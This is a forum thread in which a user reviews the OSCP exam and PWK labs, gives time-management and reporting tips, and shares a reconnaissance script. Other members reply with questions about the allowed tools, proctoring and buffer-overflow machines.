OSCP Exam review "2019" + Notes & Gift inside!

Type your comment> @singham said:

Very good and guiding writeup. Great tool. I will try.
For OSCP whether kali 2019.4 can be used. If so, whether updates can be regular or we have to use without any update.
What extra tools are to be installed in kali.
I dont get this in any write up or I miss it.

I just took the exam on July 26th, and got confirmation that I passed 2 days ago. I can tell you that I did not use the Kali image that was provided to me for the PWK course. I used Kali 2019.2. I did apply some updates to it, and I installed some extra tools. Mostly these were tools, and scripts, that I discovered to help me in my attacking boxes on HTB.

In reply to some of the things you said about no auto exploits, and anyone can chime in on this, does that include things like autoblue or things along those lines?

Hi ,thank you so much for that detailed review.

I wanna ask about this BOF machine.

Does it has to be windows or can be linux also?

Thansk

@cspence10 said:
In reply to some of the things you said about no auto exploits, and anyone can chime in on this, does that include things like autoblue or things along those lines?

Basically any tool that does the exploitation for you is not allowed, apart from Metasploit, which is allowed on 1 machine only.

You mainly have to know how to find, edit, and use exploit scripts “in Python, C, PHP…etc”

@Tugzen said:
Hi ,thank you so much for that detailed review.

I wanna ask about this BOF machine.

Does it has to be windows or can be linux also?

Thansk

Only Windows, similar to the demo shown on the OSCP course, and similar to the Windows machine you will receive with the course for BOF practice.

Just got here via another post, the tool is awesome! Thanks for developing it and releasing it for all of us to use

the script nmapAutomator it’s can be use in the exam ?

It will be great if you can create a bit detailed tutorial for nmapAutomator. I am sure I am missing something as I cannot seem to understand what additional this script does other than running run nmap. Sorry for my ignorance in advance but any help will be highly appreciated.

@ALASNOT said:
the script nmapAutomator it’s can be use in the exam ?

Of course… myself and so many others used it to great benefits :slight_smile:

@sultanrahi said:
It will be great if you can create a bit detailed tutorial for nmapAutomator. I am sure I am missing something as I cannot seem to understand what additional this script does other than running run nmap. Sorry for my ignorance in advance but any help will be highly appreciated.

There are different types of scans, and running it with ALL runs all scans.
The benefit is that it automates everything, including finding all possible ports and services and running recon on them, and finally finding potential vulnerabilities on them.

This is very beneficial when you run it in the background and go work on another machine, such that when you come back to it you’ll have all of the information ready for you, all fully automatically without needing any interaction from you.

Type your comment> @21y4d said:

@sultanrahi said:
It will be great if you can create a bit detailed tutorial for nmapAutomator. I am sure I am missing something as I cannot seem to understand what additional this script does other than running run nmap. Sorry for my ignorance in advance but any help will be highly appreciated.

There are different types of scans, and running it with ALL runs all scans.
The benefit is that it automates everything, including finding all possible ports and services and running recon on them, and finally finding potential vulnerabilities on them.

This is very beneficial when you run it in the background and go work on another machine, such that when you come back to it you’ll have all of the information ready for you, all fully automatically without needing any interaction from you.

I think for novices like me, it will be more beneficial if you can add any examples outputs for various input parameters. Like the ones provided in the AutoRecon tool

@sultanrahi said:
Type your comment> @21y4d said:

 > @sultanrahi said:
 > It will be great if you can create a bit detailed tutorial for nmapAutomator. I am sure I am missing something as I cannot seem to understand what additional this script does other than running run nmap. Sorry for my ignorance in advance but any help will be highly appreciated.

 There are different types of scans, and running it with ALL runs all scans.
 The benefit is that it automates everything, including finding all possible ports and services and running recon on them, and finally finding potential vulnerabilities on them.

 This is very beneficial when you run it in the background and go work on another machine, such that when you come back to it you'll have all of the information ready for you, all fully automatically without needing any interaction from you.

I think for novices like me, it will be more beneficial if you can add any examples outputs for various input parameters. Like the ones provided in the AutoRecon tool
GitHub - Tib3rius/AutoRecon: AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.

I’ve made the script stupid simple to use, so anyone can easily use it. It has only 7 modes “I.e. Basic, Recon, All”, all of which can be seen with -h.

If you’re not sure what to use, just run it with “./nmapAutomator xx.xx.xx.xx All” and you’ll get everything.

I hope I could help :slight_smile:

Type your comment> @21y4d said:

I’m glad you like it guys…

@achayan
Actually you forget about the proctor once you start focusing on the exam. You cannot see the the proctor, as this would probably distract students, and would give a feeling that someone is watching you…
You can take short/long breaks whenever you need, you just need inform the proctor before leaving and after returning, so that they make sure they can still see your screen and webcam before you start working again.

At the beginning of the exam you will need to show your ID and to give a webcam tour of the room you’re in, and you should be alone in the room. Also, after a long break “several hours” you will have to scan the room again, which take around 30 seconds.

I guess I forgot to mention, but this was my only attempt at the exam. I’m pretty sure every attempt you would get different machines, as they have a big exam lab with so many machines you might get.

@21y4d Thank you for sharing this.

this is awesome stuff

I heard that sqlmap is not available… that makes some SQLi near-impossible manually ? All the blind ones where you would have to try true/false statement to find table names, etc … .?

@lebutter said:
I heard that sqlmap is not available… that makes some SQLi near-impossible manually ? All the blind ones where you would have to try true/false statement to find table names, etc … .?

SQLMap is not allowed. Blind SQLi is not required…
Blind SQLi is for OSWE… my review on it coming soon…

Type your comment> @21y4d said:

For the past couple of months, I have been away from HTB, as I have been working on the OSCP labs, as a preparation for my OSCP exam.
I have just finished my OSCP exam and got my certification, and thought I would write this review, especially for HTB members, from an HTB member perspective.

pwk lab

First of, I would like to review the PWK labs.

Before starting on the lab machines, I took 5 days to finish the PWK course materials, as there are some useful things here and there.

The PWK lab in general is very well designed and well structured. This means that the lab can accommodate both beginners and advanced users, and that beginners will have plenty of machines to learn on before starting on advanced machines.

I have finished all of the lab networks, except for the Admin network, which I could not find the key to unlock it even though I literally owned all other machines. The support was of no help as well, as always.

Most of the machines in the PWK lab “80%” are designed for beginners, and are directly exploitable. This gives beginners a lot of space to learn and improve their skills before going for more advanced machines.

As for the advanced machines, the ones worth mentioning are:
-Humble “Shell”
-Sufferance “Shell”
-Gh0st “Priv Esc”
-Observer “Shell”
-Alpha
-Joe
-Pain
-Ralph

The remaining machines were mostly directly exploitable with one exploit, and some times as a root/system user.

As for the other labs “IT & Dev”, only a couple of machines were directly exploitable, and all of the rest needed credentials found on post exploitation on other machines “i.e. in txt file, repeated user pass, golden ticket stealing, etc”. The useful thing from using these labs is having to learn pivoting properly, even though this is not required for the exam. I took this chance to write my personal instructions for pivoting using 5 different methods, in both port forwarding and dynamic forwarding.

You can find my pivoting notes here:
https://github.com/21y4d/Notes/blob/master/Pivoting.txt

My only negative take on the PWK lab machine is that they were getting outdated. This means dealing mostly with Windows XP, 2008, or REHL 5 machines, which meant too many unintended exploits, making it difficult to guess which one was actually the intended way. I think the PWK lab might need an overhaul in the near future, otherwise they might become irrelevant to the real world.

pwk lab vs HTB lab

As for the PWK lab from an HTB member perspective, I honestly thought the machines were relatively easy!

So you get an idea of my experience at HTB before I started my OSCP labs, my ranking at HTB was “elite hacker”, I had 18/20 of the active machines, all of the retired machines, and the last machine I did was Sizzle, which was super fun.

The most difficult machines in the PWK lab were of a similar difficulty to a medium rated machine in HTB. The most challenging PWK machines “Sufferance, Gh0st, Observer”, were of a similar difficulty to machines like ■■■■■■■, Mirai, SolidState, Shocker, Frolic, and other similar machines at HTB.

The PWK machines were almost exclusively exploitable using exploits, with the occasional system misconfiguration. Even in my exam, almost all of the machines were exploitable using a public exploit, with some modifications.

The main reason behind this is that OffSec wants to make the lab like a real pen testing, which in this case they did a very good job, as real pen testing is mostly dealing with exploits.

However, I wish they added more advanced techniques that dealt with system misconfigurations, to teach people how to look for those as well. In a real pen test, if a machine and all of its components is fully patched, that only gives 50% of the security, as the other 50% comes from looking for misconfigurations to get access.

Finally, I think any Pro Hacker in HTB is more than ready to take the OSCP exam. However, I would still suggest taking the PWK lab, as there are some things to learn, as I will mention next.

#Proctored OSCP Exam

As for the my exam experience, here’s how I did:

Owned machines: 5/5
Points collected: 100/100
Time taken: 10 hours
Report: 8 hours/50 pages
Exam attempts: 1

If you are comfortable enough with the level of machines I was explaining earlier, you should be able to take the OSCP exam. However, as I have stated before, there definitely are some skills that one needs to learn before taking the exam.

First off, the machines are definitely not the same level as the PWK lab, but more like the HTB machines I mentioned above, expect for the 10 points one which is very straightforward .

The exam has several things that make it more challenging, and not only the difficulty of the machines in it.

  1. You have to really know how to handle your time properly. I think this is the main challenge in the OSCP exam. Rooting 5 “medium difficulty” machines in just 24 hours is no easy task, as it takes a lot of skill to be able to enumerate, adjust, and exploit all of these targets in just 24 hours, while having to take some time to rest and cool off. Honestly, I think if the machines were more advanced, or if the exam time was just 12 hours instead, very few people would be able to pass the exam. Which is why I think the exam time/difficulty were very well matched.

  2. Rabbit holes! If the PWK lab machines do not have many rabbit holes, the OSCP exam’s definitely do! I think all of the machines I had to exploit had rabbit holes “except for the BOF of course”. If you didn’t know how to deal with rabbit holes, you will waste your precious time without any progress. This was one of the things I had to teach myself before taking the OSCP exam, so I started a habit of writing a summary of findings as I was doing any machine. I simply write the attack surface and chance of exploitation, then I start from the top, and if one does not work for a while I move to the other. This tip will make your life much easier during your OSCP exam. There’s an excellent writeup by g0tmi1k for the Alpha machine in PWK forums, which teaches you how to do that.

  3. Reporting. While some might think that having to write a report after getting the needed points from the exam is unnecessary, I would say otherwise. Personally, I work in this field, and I know that any pen tester who does not know how to write a good report will not be useful for anyone. The companies do not want you to tell them that their machines are vulnerable, they want to know how exactly, so that they can not only patch the vulnerability, but also fix their design and way of thinking. Having said that, the OSCP exam report prepares you for such real life pen testing reports, as it gives you a template you can build upon, and start learning the design of such reports.

As for the proctoring part of the exam, even though you would not have the freedom of doing the machines as if you were alone “i.e. like in the lab”, since someone would be watching you all the time, I think this part was very necessary and well thought by OffSec. This was just like when I took the PMP or CCNA exams, an online exam with someone proctoring you to prevent cheating. If you are not cheating, you have nothing to hide and should not have a problem with proctoring ”cheating means someone else doing your work for you". This will also give you credit for your efforts, and not have some people doubt that some OSCP holders might not have the skill.

The BOF machine was fairly similar to the example shown in the PWK course, which is basic Windows BOF, with nothing advanced “ASLR, DEP, x64…etc”.

It is a simple buffer overflow, requiring you to know three basic thing:
1-Finding the length of the buffer
2-Finding bad characters
3-Finding a proper return address

You can find the python scripts I used with detailed instructions here:
Redacted

As for the use of Metasploit in the exam, I have always preferred not to use MSF unless it was necessary, as knowing how to manually exploit teaches you much much more. Even in the PWK lab, I didn’t use MSF at all, except for post exploitation enumeration, so it would be faster. However, in my exam, I did use MSF, because I faced an exploit I knew that can only be done with MSF, as I have faced this exact vulnerability before here in one of the HTB boxes, and back then I tried everything without MSF “so did other people” and eventually I had to use MSF. This saved me a lot of time, since I already knew I have to use MSF here, and not waste my time trying to exploit it without it.

At the end, I think that the PWK lab does prepare you for a real pen test, and if you are OSCP certified, then you are definitely qualified to be a pen tester.

#My Gift for HTB Members

I wish you liked my review of the OSCP exam, and I have a gift for you.
During my PWK lab time, I wanted to improve my bash scripting skills. So, I wanted to automate all of the process of recon/enumeration that I run every time, and instead focus my attention on real pen testing.

I created a tool I called “nmapAutomator”, which is designed to run fully automatically with no interaction from your side whatsoever. If you choose the “All” option, and run the script for the target IP, I can assure you that you can leave the script running in the background, and if there’s anything nmap can tell you, you will find it. I tried to make it as efficient as possible, so that it would give accurate results as fast as possible. I even added automatic recon/enumeration to be run after that "i.e. gobuster, nikto, smbmap…etc”, based on the found ports.

I have tested this script on over 20 PWK lab machines, and I can say that 95% of the time if there’s something recon would tell you, you will find it here. I have not yet tested this machine on HTB boxes, but I assume it would work just the same, as it should be universal.

Finally, I have used this script during my OSCP exam “which was the main reason I’ve written it”, and I can honestly say that this was one of the reasons I was able to finish all machines in 10 hours. This is simply because before starting any machine, I run this script with the “All” option on another machine, and by the time I go to that other machine, I would have a full recon report ready for me, instead of wasting an hour or so waiting for that. I did not have to run any other recon tool during my exam, as everything was automatically laid out by this script.

I hope you like it, and please feel free to share it or improve it.

You can get it and read more about it from the following GitHub link:
GitHub - 21y4d/nmapAutomator: A script that you can run in the background!

#Future Plans

Now that I have obtained my OSCP certification, I think I will directly go for OSCE, as I have been preparing for both together. For those who took it, how is it different from OSCP? What skills do I need before joining the CTP course and lab?

I also think I will take OSWE and OSEE after that, but we’ll see about that later.

Thanks a lot for taking the time to read my review :slight_smile:

My friend, thanks for your report, I am starting my studies in Cybersecurity and my goal is to take the OSCP and work with pentest.

Your story filled me with joy and motivated me to try more, I want to tell you in a few months that I got OSCP.

It is a pity that I live in Brazil and the amount converted to my currency reaches more than 5 thousand reais.

I will study and add money to win this battle.

Success for you.

Type your comment> @Gh0stBl4ck said:

Type your comment> @21y4d said:

For the past couple of months, I have been away from HTB, as I have been working on the OSCP labs, as a preparation for my OSCP exam.
I have just finished my OSCP exam and got my certification, and thought I would write this review, especially for HTB members, from an HTB member perspective.

pwk lab

First of, I would like to review the PWK labs.

Before starting on the lab machines, I took 5 days to finish the PWK course materials, as there are some useful things here and there.

The PWK lab in general is very well designed and well structured. This means that the lab can accommodate both beginners and advanced users, and that beginners will have plenty of machines to learn on before starting on advanced machines.

I have finished all of the lab networks, except for the Admin network, which I could not find the key to unlock it even though I literally owned all other machines. The support was of no help as well, as always.

Most of the machines in the PWK lab “80%” are designed for beginners, and are directly exploitable. This gives beginners a lot of space to learn and improve their skills before going for more advanced machines.

As for the advanced machines, the ones worth mentioning are:
-Humble “Shell”
-Sufferance “Shell”
-Gh0st “Priv Esc”
-Observer “Shell”
-Alpha
-Joe
-Pain
-Ralph

The remaining machines were mostly directly exploitable with one exploit, and some times as a root/system user.

As for the other labs “IT & Dev”, only a couple of machines were directly exploitable, and all of the rest needed credentials found on post exploitation on other machines “i.e. in txt file, repeated user pass, golden ticket stealing, etc”. The useful thing from using these labs is having to learn pivoting properly, even though this is not required for the exam. I took this chance to write my personal instructions for pivoting using 5 different methods, in both port forwarding and dynamic forwarding.

You can find my pivoting notes here:
https://github.com/21y4d/Notes/blob/master/Pivoting.txt

My only negative take on the PWK lab machine is that they were getting outdated. This means dealing mostly with Windows XP, 2008, or REHL 5 machines, which meant too many unintended exploits, making it difficult to guess which one was actually the intended way. I think the PWK lab might need an overhaul in the near future, otherwise they might become irrelevant to the real world.

pwk lab vs HTB lab

As for the PWK lab from an HTB member perspective, I honestly thought the machines were relatively easy!

So you get an idea of my experience at HTB before I started my OSCP labs, my ranking at HTB was “elite hacker”, I had 18/20 of the active machines, all of the retired machines, and the last machine I did was Sizzle, which was super fun.

The most difficult machines in the PWK lab were of a similar difficulty to a medium rated machine in HTB. The most challenging PWK machines “Sufferance, Gh0st, Observer”, were of a similar difficulty to machines like ■■■■■■■, Mirai, SolidState, Shocker, Frolic, and other similar machines at HTB.

The PWK machines were almost exclusively exploitable using exploits, with the occasional system misconfiguration. Even in my exam, almost all of the machines were exploitable using a public exploit, with some modifications.

The main reason behind this is that OffSec wants to make the lab like a real pen testing, which in this case they did a very good job, as real pen testing is mostly dealing with exploits.

However, I wish they added more advanced techniques that dealt with system misconfigurations, to teach people how to look for those as well. In a real pen test, if a machine and all of its components is fully patched, that only gives 50% of the security, as the other 50% comes from looking for misconfigurations to get access.

Finally, I think any Pro Hacker in HTB is more than ready to take the OSCP exam. However, I would still suggest taking the PWK lab, as there are some things to learn, as I will mention next.

#Proctored OSCP Exam

As for the my exam experience, here’s how I did:

Owned machines: 5/5
Points collected: 100/100
Time taken: 10 hours
Report: 8 hours/50 pages
Exam attempts: 1

If you are comfortable enough with the level of machines I was explaining earlier, you should be able to take the OSCP exam. However, as I have stated before, there definitely are some skills that one needs to learn before taking the exam.

First off, the machines are definitely not the same level as the PWK lab, but more like the HTB machines I mentioned above, expect for the 10 points one which is very straightforward .

The exam has several things that make it more challenging, and not only the difficulty of the machines in it.

  1. You have to really know how to handle your time properly. I think this is the main challenge in the OSCP exam. Rooting 5 “medium difficulty” machines in just 24 hours is no easy task, as it takes a lot of skill to be able to enumerate, adjust, and exploit all of these targets in just 24 hours, while having to take some time to rest and cool off. Honestly, I think if the machines were more advanced, or if the exam time was just 12 hours instead, very few people would be able to pass the exam. Which is why I think the exam time/difficulty were very well matched.

  2. Rabbit holes! If the PWK lab machines do not have many rabbit holes, the OSCP exam’s definitely do! I think all of the machines I had to exploit had rabbit holes “except for the BOF of course”. If you didn’t know how to deal with rabbit holes, you will waste your precious time without any progress. This was one of the things I had to teach myself before taking the OSCP exam, so I started a habit of writing a summary of findings as I was doing any machine. I simply write the attack surface and chance of exploitation, then I start from the top, and if one does not work for a while I move to the other. This tip will make your life much easier during your OSCP exam. There’s an excellent writeup by g0tmi1k for the Alpha machine in PWK forums, which teaches you how to do that.

  3. Reporting. While some might think that having to write a report after getting the needed points from the exam is unnecessary, I would say otherwise. Personally, I work in this field, and I know that any pen tester who does not know how to write a good report will not be useful for anyone. The companies do not want you to tell them that their machines are vulnerable, they want to know how exactly, so that they can not only patch the vulnerability, but also fix their design and way of thinking. Having said that, the OSCP exam report prepares you for such real life pen testing reports, as it gives you a template you can build upon, and start learning the design of such reports.

As for the proctoring part of the exam, even though you would not have the freedom of doing the machines as if you were alone “i.e. like in the lab”, since someone would be watching you all the time, I think this part was very necessary and well thought by OffSec. This was just like when I took the PMP or CCNA exams, an online exam with someone proctoring you to prevent cheating. If you are not cheating, you have nothing to hide and should not have a problem with proctoring ”cheating means someone else doing your work for you". This will also give you credit for your efforts, and not have some people doubt that some OSCP holders might not have the skill.

The BOF machine was fairly similar to the example shown in the PWK course, which is basic Windows BOF, with nothing advanced “ASLR, DEP, x64…etc”.

It is a simple buffer overflow, requiring you to know three basic thing:
1-Finding the length of the buffer
2-Finding bad characters
3-Finding a proper return address

You can find the python scripts I used with detailed instructions here:
Redacted

As for the use of Metasploit in the exam, I have always preferred not to use MSF unless it was necessary, as knowing how to manually exploit teaches you much much more. Even in the PWK lab, I didn’t use MSF at all, except for post exploitation enumeration, so it would be faster. However, in my exam, I did use MSF, because I faced an exploit I knew that can only be done with MSF, as I have faced this exact vulnerability before here in one of the HTB boxes, and back then I tried everything without MSF “so did other people” and eventually I had to use MSF. This saved me a lot of time, since I already knew I have to use MSF here, and not waste my time trying to exploit it without it.

At the end, I think that the PWK lab does prepare you for a real pen test, and if you are OSCP certified, then you are definitely qualified to be a pen tester.

#My Gift for HTB Members

I wish you liked my review of the OSCP exam, and I have a gift for you.
During my PWK lab time, I wanted to improve my bash scripting skills. So, I wanted to automate all of the process of recon/enumeration that I run every time, and instead focus my attention on real pen testing.

I created a tool I called “nmapAutomator”, which is designed to run fully automatically with no interaction from your side whatsoever. If you choose the “All” option, and run the script for the target IP, I can assure you that you can leave the script running in the background, and if there’s anything nmap can tell you, you will find it. I tried to make it as efficient as possible, so that it would give accurate results as fast as possible. I even added automatic recon/enumeration to be run after that "i.e. gobuster, nikto, smbmap…etc”, based on the found ports.

I have tested this script on over 20 PWK lab machines, and I can say that 95% of the time if there’s something recon would tell you, you will find it here. I have not yet tested this machine on HTB boxes, but I assume it would work just the same, as it should be universal.

Finally, I have used this script during my OSCP exam “which was the main reason I’ve written it”, and I can honestly say that this was one of the reasons I was able to finish all machines in 10 hours. This is simply because before starting any machine, I run this script with the “All” option on another machine, and by the time I go to that other machine, I would have a full recon report ready for me, instead of wasting an hour or so waiting for that. I did not have to run any other recon tool during my exam, as everything was automatically laid out by this script.

I hope you like it, and please feel free to share it or improve it.

You can get it and read more about it from the following GitHub link:
GitHub - 21y4d/nmapAutomator: A script that you can run in the background!

#Future Plans

Now that I have obtained my OSCP certification, I think I will directly go for OSCE, as I have been preparing for both together. For those who took it, how is it different from OSCP? What skills do I need before joining the CTP course and lab?

I also think I will take OSWE and OSEE after that, but we’ll see about that later.

Thanks a lot for taking the time to read my review :slight_smile:

My friend, thanks for your report, I am starting my studies in Cybersecurity and my goal is to take the OSCP and work with pentest.

Your story filled me with joy and motivated me to try more, I want to tell you in a few months that I got OSCP.

It is a pity that I live in Brazil and the amount converted to my currency reaches more than 5 thousand reais.

I will study and add money to win this battle.

Success for you.

Wish you all the best!

Good and well structured review. It gave me confidence that once I’ll get good at HTB I should feel prepared for taking OSCP.

I have a question about the course I haven’t seen anywhere: are scripting and programming included in the course, considering you will need to modify existing exploits?

Also, the nmapAutomator is pure gold for a beginner like me, I really appreciate you creating it and releasing it to the public.

Wish you all the best!